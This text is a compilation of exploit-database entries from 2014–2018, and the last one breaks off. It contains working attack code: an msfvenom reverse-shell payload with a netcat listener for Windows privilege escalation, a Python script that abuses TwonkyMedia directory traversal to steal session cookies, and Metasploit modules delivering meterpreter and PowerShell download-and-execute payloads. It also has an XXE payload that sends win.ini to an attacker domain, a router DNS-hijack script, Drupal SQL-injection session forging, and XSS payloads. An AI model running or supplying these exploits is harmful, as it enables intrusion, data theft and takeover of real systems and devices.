is located in the same directory and also runs under Local System.
By default in Windows with Public Folder sharing enabled, the permissions on any file/folder under "C:\Users\Public\" is Full Control
for Everyone. This means unprivileged users have the ability to add, delete, or modify any and all
files/folders.
Exploit:
1. Generate malicious .exe on attacking machine
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -f exe > /var/www/html/xsetsrv.exe
2. Setup listener and start apache on attacking machine
nc -nlvvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.0.149/xsetsrv.exe and download
4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe
xsetsrv.exe > xsetsrv.bak
5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\
6. Restart victim machine and login as unprivileged user
7. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running a LabF nfsAxe installed at the default location using a
low-privileged user account
Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.
Fix:
Don't use default install path
# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5
PoC
Acrolinx dashboard windows works on the server.
http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html
'''
---------------------------------------------------------------------
1. About
---------------------------------------------------------------------
# Exploit Title: TwonkyMedia Server 7.0.11-8.5 Directory Traversal
# Date: 2018-03-27
# Exploit Author: Sven Fassbender
# Contact: https://twitter.com/mezdanak
# Vendor Homepage: http://www.lynxtechnology.com/home
# Software Link: https://twonky.com/downloads/index.html
# Version: 7.0.11-8.5
# CVE : CVE-2018-7171
# Category: webapps
---------------------------------------------------------------------
2. Background information
---------------------------------------------------------------------
"With Twonky from Lynx Technology, you can quickly discover your media libraries of digital videos,
photos and music in your home, control them from mobile devices, and enjoy them on connected screens and speakers.
Twonky Server is the industry leading DLNA/UPnP Media Server from Lynx Technology that enables sharing media content
between connected devices. Twonky Server is used worldwide and is available as a standalone server
(end user installable, e.g. for PCs/Macs) or an embedded server for devices such as NAS, routers/gateways and STBs.
Twonky Server’s web UI provides optimal capability for you to easily and reliably control and play back your
media files in a variety of ways, and to “beam” those media files to other connected devices." --extract from https://twonky.com
Previous similar vulnerabilities:
https://packetstormsecurity.com/files/112227/PacketVideo-TwonkyServer-TwonkyMedia-Directory-Traversal.html
Fix:
https://docs.twonky.com/display/TRN/Twonky+Server+7.0.x
Statistics:
Around 20800 TwonkyMedia Servers public available listed on shodan.io worldwide. (https://www.shodan.io/search?query=twonky)
Rarely protected by password (only around 2%).
Top Countries:
1. United States
2. Germany
3. Korea
4. Russian Federation
5. France
6. Italy
7. Taiwan
8. Poland
9. Hungary
10. United Kingdom
TwonkyMedia Server seems too be pre installed on a huge range of NAS devices. For example the following NAS devices:
Thecus N2310
Thecus N4560
WDMyCloud,
MyCloudEX2Ultra,
WDMyCloudEX4,
WDMyCloudEX2100,
QNAP,
Zyxel NAS326,
Zyxel NAS542,
Zyxel NSA310,
Zyxel NSA310S,
Zyxel NSA320,
Zyxel NSA325-v2
...
Other devices:
Belkin routers
Zyxel EMG2926-Q10A
...
---------------------------------------------------------------------
3. Vulnerability description
---------------------------------------------------------------------
TwonkyMedia Server has a function which allows browsing parts of the file system, that are marked as shares by the user.
By setting the "contentdir" parameter to "/../" with the rpc call "set_all", an attacker can discover the filesystem outside of the user specified shares:
HTTP request:
POST /rpc/set_all HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 228
Connection: close
contentdir=/../
Now one can discover the file system with requests like the following:
HTTP request:
GET /rpc/dir?path=/ HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/webconfig
X-Requested-With: XMLHttpRequest
Connection: close
HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 128
Date: Sat, 03 Feb 2018 09:31:28 GMT
Accept-Ranges: bytes
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-cache
EXT:
Server: Linux/2.x.x, UPnP/1.0, pvConnect UPnP SDK/1.0, Twonky UPnP SDK/1.1
001D/
002D/bin
003D/boot
004D/CacheVolume
005D/DataVolume
006D/dev
007D/etc
008D/home
009D/lib
010D/media
011D/mnt
012D/nfs
013D/opt
014D/proc
015D/root
016D/run
017D/sbin
018D/shares
019D/srv
020D/sys
021D/system
022D/tmp
023D/usr
024D/var
---------------------------------------------------------------------
4. Proof of Concept
---------------------------------------------------------------------
https://github.com/mechanico/sharingIsCaring/blob/master/twonky.py
---------------------------------------------------------------------
5. Attack Scenarios
---------------------------------------------------------------------
- TwonkyMedia Server path traversal vs. WD MyCloud
Files with filename representing PHPSESSID admin cookie's were discovered in the /tmp/ directory of a WDMyCloud NAS device:
$ python twonky.py 192.168.188.9 9000
https://www.shodan.io/host/192.168.188.9
*** Port 9000 opened ***
Run Twonky browser on port 9000 [Y, N]? [Y]
*** Get Serverdetails from Twonky ***
Server Name: WDMyCloud
Serverplatform: armel_gcc473_glibc215_64k
Pictures shared: 0
Videos shared: 0
Twonky Version: 7.2.9-6
Build date: 03/25/2015 (mm/dd/yyyy)
*** 'contentbase' path set to '/'' ***
path nr:
------------------------------
[...]
022 Dir /tmp
[...]
------------------------------
path nr: 022
------------------------------
[...]
059 Fil sess_c61ufnntn31o2ovuj0ncf8fkp1
[...]
Valid WDMyCloud cookie discovered: {'PHPSESSID': 'c61ufnntn31o2ovuj0ncf8fkp1'}
------------------------------
path nr:
This cookie can be used to access the WDMyCloud Rest-Api. (http://ip/api/2.1/rest/...)
With this access an attacker can e.g., create/modify users, download all files accessible by the user, update Firmware, ...
- TwonkyMedia Server path traversal vs. privacy
People may store sensitive information on their NAS devices.
Such as:
- Business information
- Health records
- Passwords
- Credit Cards
- Passports
- Currcillum Vitaes
- Invoices Business/Private
- "Private" photos
- Illegal material
- ...
- DMCA protected information
There maybe also DMCA protected information public available.
Such as:
- Movies
- Music
---------------------------------------------------------------------
6. Fix
---------------------------------------------------------------------
All TwonkyMedia Server versions between 7.0.11 -> 8.5 have been tested as vulnerable.
While writing this advisory 8.5 is the latest version available:
https://twonky.com/downloads/index.html
---------------------------------------------------------------------
'''
import urllib3
import sys
import socket
import requests
from colorama import init, Fore
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
# Extend KEYWORDS, list if you want. This will highlight files and directory names that include a keyword.
KEYWORDS = ["CRYPTO", "CRIPTO", "BITCOIN", "WALLET"]
def keywordDetector(line):
for keyword in KEYWORDS:
if line.upper().find(keyword) != -1:
return True
return False
def checkPort(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,int(port)))
s.settimeout(2)
s.shutdown(2)
return True
except:
return False
def setContentBase(host, port):
payload = "\ncontentbase=/../\n"
url = "http://{0}:{1}/rpc/set_all".format(host, port)
try:
response = requests.post(url, data=payload, timeout=5)
except requests.exceptions.ReadTimeout:
print (Fore.RED + "*** Timeout while setting contentbase path to '/' ***")
except requests.exceptions.ChunkedEncodingError:
print (Fore.RED + "*** 'contentbase' cannot be modified, password protection active ***")
sys.exit()
except requests.exceptions.ConnectionError:
url = "https://{0}:{1}/rpc/set_all".format(host, port)
response = requests.post(url, data=payload, timeout=5, verify=False)
if response.status_code != 200:
print (Fore.RED + "*** 'contentbase' cannot be modified, password protection active ***")
print (Fore.YELLOW + "*** You should try to login with admin:admin (default creds) ***")
sys.exit()
else:
print (Fore.MAGENTA + "*** 'contentbase' path set to '/'' ***")
return True
def serverInfo(host, port):
print (Fore.MAGENTA + "*** Get Serverdetails from Twonky ***")
try:
url = "http://{0}:{1}/rpc/get_friendlyname".format(host, port)
friendlyname = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
url= "https://{0}:{1}/rpc/get_friendlyname".format(host, port)
friendlyname = requests.get(url, timeout=5, verify=False)
if friendlyname.status_code == 200:
print (Fore.GREEN + "Server Name: {0}".format(friendlyname.text))
else:
print (Fore.RED + "*** Not authorized to edit settings, password protection active ***")
sys.exit()
try:
url = "http://{0}:{1}/rpc/info_status".format(host, port)
infoStatus = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
url = "https://{0}:{1}/rpc/info_status".format(host, port)
infoStatus = requests.get(url, timeout=5, verify=False)
for line in infoStatus.iter_lines():
if line :
if line.find("version") != -1:
lineSplited = line.split("|")
versionNumber = lineSplited[1]
print (Fore.GREEN + "Twonky Version: {0}".format(versionNumber))
elif line.find("serverplatform") != -1:
lineSplited = line.split("|")
serverPlatform = lineSplited[1]
print (Fore.GREEN + "Serverplatform: {0}".format(serverPlatform))
elif line.find("builddate") != -1:
lineSplited = line.split("|")
buildDate = lineSplited[1]
print (Fore.GREEN + "Build date: {0}".format(buildDate))
elif line.find("pictures") != -1:
lineSplited = line.split("|")
pictureCount = lineSplited[1]
print (Fore.GREEN + "Pictures shared: {0}".format(pictureCount))
elif line.find("videos") != -1:
lineSplited = line.split("|")
videoCount = lineSplited[1]
print (Fore.GREEN + "Videos shared: {0}".format(videoCount))
return versionNumber
def checkSessionCookie(host, cookieString):
url = "http://{0}/api/2.1/rest/device_user".format(host)
cookieTemp = cookieString.split("_")
cookie = {'PHPSESSID': cookieTemp[1]}
response = requests.get(url, timeout=10, cookies=cookie)
if response.status_code == 200:
return cookie
else:
return False
def browser(host, port, version):
while True:
var = raw_input("path nr: ")
if var != "exit" :
if version[0] == "8":
url = "http://{0}:{1}/rpc/dir?path={2}".format(host, port, var)
else:
url = "http://{0}:{1}/rpc/dir/path={2}".format(host, port, var)
try:
response = requests.get(url, timeout=5)
except requests.exceptions.ConnectionError:
if version[0] == "8":
url = "https://{0}:{1}/rpc/dir?path={2}".format(host, port, var)
else:
url = "https://{0}:{1}/rpc/dir/path={2}".format(host, port, var)
response = requests.get(url, timeout=5, verify=False)
print "-" * 30
validCookieString = ""
for line in response.iter_lines():
if line :
if len(line) > 3:
if line[3] == "D":
line = line[:4].replace("D", " Dir ") + line[4:]
if keywordDetector(line[4:]):
print (Fore.RED + line)
else:
print (Fore.GREEN + line)
elif line[3] == "F":
line = line[:4].replace("F", " Fil ") + line[4:]
if keywordDetector(line[4:]):
print (Fore.RED + line)
elif line[8:13] == "sess_":
print line
validCookie = checkSessionCookie(host, line[8:])
if validCookie != False:
validCookieString = validCookie
else:
print line
else:
print line
if len(validCookieString) >= 1:
print (Fore.RED + "Valid WDMyCloud cookie discovered: {0}".format(validCookieString))
print "-" * 30
elif var == "exit":
sys.exit()
#*** Program start here ***
if __name__ == '__main__':
if len(sys.argv) != 3:
print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
else:
host = sys.argv[1]
print (Fore.MAGENTA + "https://www.shodan.io/host/{0}".format(host))
port = sys.argv[2]
if checkPort(host, port):
print (Fore.GREEN + "*** Port {0} opened ***".format(port))
twonky = raw_input("Run Twonky browser on port {0} [Y, N]? [Y] ".format(port))
if twonky.upper() != "N":
version = serverInfo(host, port)
if setContentBase(host, port):
browser(host, port, version)
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).
A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.
It is possible for an attacker to upload a malicious script to issue operating system commands.
This issue is caused by improper session handling in /action/beats_uploader.php file.
This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.
},
'License' => MSF_LICENSE,
'Author' =>
[
'www.sec-consult.com', # Vulnerability Discovery, PoC
'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
],
'References' =>
[
[ 'EDB', '44250' ]
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket < 4.0.0 - Release 4902', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 03 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
])
end
def uri
return target_uri.path
end
def check
vprint_status('Trying to detect ClipBucket on target.')
# check for readme file
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'readme')
})
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code == 200 && res.body.include?('ClipBucket')
vprint_error('Could not find readme')
return CheckCode::Safe
end
# check for beats_uploader.php file
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php')
})
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code == 200
vprint_error('Could not find beats_uploader.php')
return CheckCode::Safe
end
Exploit::CheckCode::Appears
end
def exploit
# generate the PHP meterpreter payload
stager = '<?php '
stager << payload.encode
stager << '?>'
# Setting POST data
post_data = Rex::MIME::Message.new
post_data.add_part(stager, content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = 'form-data; name="file"; filename="pfile.php"') # payload
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="plupload"') # require for uploading
post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="name"')
data = post_data.to_s
print_status('Uploading payload..')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php'),
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
jsonres = res.get_json_document
# If the server returns 200 and success yes, we assume we uploaded the malicious
# file successfully
unless res && res.code == 200 && jsonres['success'] == 'yes'
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
print_good('Looking For Payload..')
pdir = jsonres['file_directory']
file_name = jsonres['file_name']
pext = jsonres['extension']
print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")
# Payload name
pname = "#{file_name}.php"
# Cleanup is Good Idea .
register_files_for_cleanup(pname)
print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'actions', pdir, pname)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res && res.code != 200
print_error('Unexpected response, probably the exploit failed')
end
end
end
---------------------------------------------------------------------
1. About
---------------------------------------------------------------------
# Exploit Title: TwonkyMedia Server 7.0.11-8.5 Persistent XSS
# Date: 2018-03-27
# Exploit Author: Sven Fassbender
# Contact: https://twitter.com/mezdanak
# Vendor Homepage: http://www.lynxtechnology.com/home
# Software Link: https://twonky.com/downloads/index.html
# Version: 7.0.11-8.5
# CVE : CVE-2018-7203
# Category: webapps
---------------------------------------------------------------------
2. Background information
---------------------------------------------------------------------
"With Twonky from Lynx Technology, you can quickly discover your media libraries of digital videos,
photos and music in your home, control them from mobile devices, and enjoy them on connected screens and speakers.
Twonky Server is the industry leading DLNA/UPnP Media Server from Lynx Technology that enables sharing media content
between connected devices. Twonky Server is used worldwide and is available as a standalone server
(end user installable, e.g. for PCs/Macs) or an embedded server for devices such as NAS, routers/gateways and STBs.
Twonky Server’s web UI provides optimal capability for you to easily and reliably control and play back your
media files in a variety of ways, and to “beam” those media files to other connected devices." --extract from https://twonky.com
Statistics:
Around 20800 TwonkyMedia Servers public available listed on shodan.io worldwide. (https://www.shodan.io/search?query=twonky)
Rarely protected by password (only around 2%).
Top Countries:
1. United States
2. Germany
3. Korea
4. Russian Federation
5. France
6. Italy
7. Taiwan
8. Poland
9. Hungary
10. United Kingdom
TwonkyMedia Server seems too be pre installed on a huge range of NAS devices. For example the following NAS devices:
Thecus N2310
Thecus N4560
WDMyCloud,
MyCloudEX2Ultra,
WDMyCloudEX4,
WDMyCloudEX2100,
QNAP,
Zyxel NAS326,
Zyxel NAS542,
Zyxel NSA310,
Zyxel NSA310S,
Zyxel NSA320,
Zyxel NSA325-v2
...
Other devices:
Belkin routers
Zyxel EMG2926-Q10A
...
---------------------------------------------------------------------
3. Vulnerability description
---------------------------------------------------------------------
TwonkyMedia Server lacks of validating user input in the "Servername" input field.
HTTP request:
POST /rpc/set_all HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/webconfig
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 39
Connection: close
friendlyname=<script>alert(1)</script>
HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Language: de
Content-Length: 30
Date: Tue, 19 Dec 2017 04:09:21 GMT
Accept-Ranges: bytes
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-cache
EXT:
Server: Linux/2.x.x, UPnP/1.0, pvConnect UPnP SDK/1.0, Twonky UPnP SDK/1.1
<html><body>ok</body></html>
Now if e.g. http://192.168.188.9:9000 is visited, the injected JavaScript code get's executed.
---------------------------------------------------------------------
4. Fix
---------------------------------------------------------------------
All TwonkyMedia Server versions between 7.0.11 -> 8.5 have been tested as vulnerable.
While writing this advisory 8.5 is the latest version available:
https://twonky.com/downloads/index.html
---------------------------------------------------------------------
# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits
Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">
%remote;%root;%oob;]>
xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">
Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)
#!/bin/bash
#
# Tenda N11 Wireless Router V5.07.43_en_NEX01
# Cookie Session Weakness Remote DNS Change PoC Exploit
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda N11 Wireless Router V5.07.43_en_NEX01 "
echo " Cookie Session Weakness Remote DNS Change PoC Exploit"
echo " ==========================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://ethical-hacker.org/ https://fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -H "Cookie: admin:language=en; path=/" "http://$1/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=$2&DS2=$3" 2>/dev/null
# Proof Of Concept 2:
# [todor@paladium ~]$ GET "http://133.7.13.37:8080/advance.asp" | grep def_password= | sed 's/def_password=/ Password: /g'
# Password: "Ethical-Hacker-Bulgaria-2o18";
# [todor@paladium ~]$
<?php
// _____ __ __ _ _______
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
//·
include 'common.inc';
include 'password.inc';
// set values
$user_name = 'admin';
$url = isset($argv[1])?$argv[1]:'';
$user_id = isset($argv[2])?intval($argv[2]):1;
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$user_id]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$url = rtrim($url,'/');
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- ";
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
// send the request to the server
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
echo "Session with this ID created:\n";
echo "S".$cookieName.": ".$sec_ssid;
# Exploit Title: Open-AuditIT Professional 2.1 - Stored Cross site scripting (XSS)
# Date: 27-03-2018
# Exploit Author: Nilesh Sapariya
# Contact: https://twitter.com/nilesh_loganx
# Website: https://nileshsapariya.blogspot.com
# Vendor Homepage: https://www.open-audit.org/
# Version: 2.1
# CVE : CVE-2018-8903
# Category: Webapp Open-AuditIT Professional 2.1
1. Description:-
It was observed that attacker is able to inject a malicious script in the
Application. As server is not filtering the inputs provided by an attacker
and the script executes in the victim browser when he tries to visit the
page
2. Proof of Concept
Login into Open-AuditIT Professional 2.1
1] Go to Home ==> Credentials
2] Enter XSS payload in Name and Description Field
"><img src=x onerror=alert(1337);>
3] Click on Submit
Visi this page :-
http://localhost/omk/open-audit/credentials
3] POCs and steps:
https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
'Description' => %q(
This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
a vulnerability in the ElectronJS Framework protocol handler can be used to
get arbitrary command execution if the user clicks on a specially crafted URL.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Wflki', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'DefaultOptions' =>
{
'SRVPORT' => '80',
'URIPATH' => '/',
},
'References' =>
[
[ 'EDB', '43899' ],
[ 'BID', '102796' ],
[ 'CVE', '2018-1000006' ],
],
'Platform' => 'win',
'Targets' =>
[
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 25 2018'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
], self.class
)
end
def gen_psh(url)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
download_and_run = "#{ignore_cert}#{download_string}"
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end
def serve_payload(cli)
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
exec_in_place: true
)
print_status("Delivering Payload")
send_response_html(cli, data, 'Content-Type' => 'application/octet-stream')
end
def serve_page(cli)
psh = gen_psh("#{get_uri}payload")
psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'")
val = rand_text_alpha(5)
html = %Q|<html>
<!doctype html>
<script>
window.location = 'exodus://#{val}" --gpu-launcher="cmd.exe /k #{psh_escaped}" --#{val}='
</script>
</html>
|
send_response_html(cli, html)
end
def on_request_uri(cli, request)
case request.uri
when /payload$/
serve_payload(cli)
else
serve_page(cli)
end
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'GitStack Unsanitized Argument RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in GitStack through v2.3.10, caused by an unsanitized argument
being passed to an exec function call. This module has been tested
on GitStack v2.3.10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE', '2018-5955'],
['EDB', '43777'],
['EDB', '44044'],
['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'DisclosureDate' => 'Jan 15 2018',
'DefaultTarget' => 0))
end
def check_web
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
if res.body =~ /true/
vprint_good('Web interface is enabled')
return true
else
vprint_error('Web interface is disabled')
return false
end
else
print_error('Unable to determine status of web interface')
return nil
end
end
def check_repos
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'GET',
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
mylist = res.get_json_document
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
return nil
end
if mylist.length == 0
vprint_error('No repositories found')
return false
else
vprint_good('Repositories found')
return mylist
end
else
print_error('Unable to determine available repositories')
return nil
end
end
def update_web(web)
data = {'enabled' => web}
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'PUT',
'data' => data.to_json
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
end
end
def create_repo
repo = Rex::Text.rand_text_alpha(5)
c_token = Rex::Text.rand_text_alpha(5)
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'POST',
'cookie' => "csrftoken=#{c_token}",
'vars_post' => {
'name' => repo,
'csrfmiddlewaretoken' => c_token
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
